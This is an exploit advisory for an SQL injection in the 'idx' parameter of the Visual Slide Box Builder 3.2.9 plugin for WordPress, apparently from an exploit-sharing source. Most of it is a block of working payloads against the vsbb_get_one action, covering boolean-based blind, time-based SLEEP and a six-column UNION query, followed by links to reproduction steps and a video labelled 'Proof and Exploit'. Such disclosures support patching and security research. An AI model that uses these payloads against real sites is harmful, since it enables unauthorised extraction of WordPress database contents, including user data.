## Title: WordPress 6.0 - Visual Slide Box Builder 3.2.9 SQLi ## Author: nu11secur1ty ## Date: 07.11.2022 ## Vendor: https://wphive.com/ ## Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin ## Description: The parameter `idx` from the Visual Slide Box Builder plugin app for WordPress appears to be vulnerable to SQLi. The attacker can receive all database information from the WordPress database and he can use it for very malicious purposes. [+] Payloads: ```mysql --- Parameter: idx (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) HAVING 1854=1854 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL) Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin) ## Proof and Exploit: [href](https://streamable.com/jlp5sx)
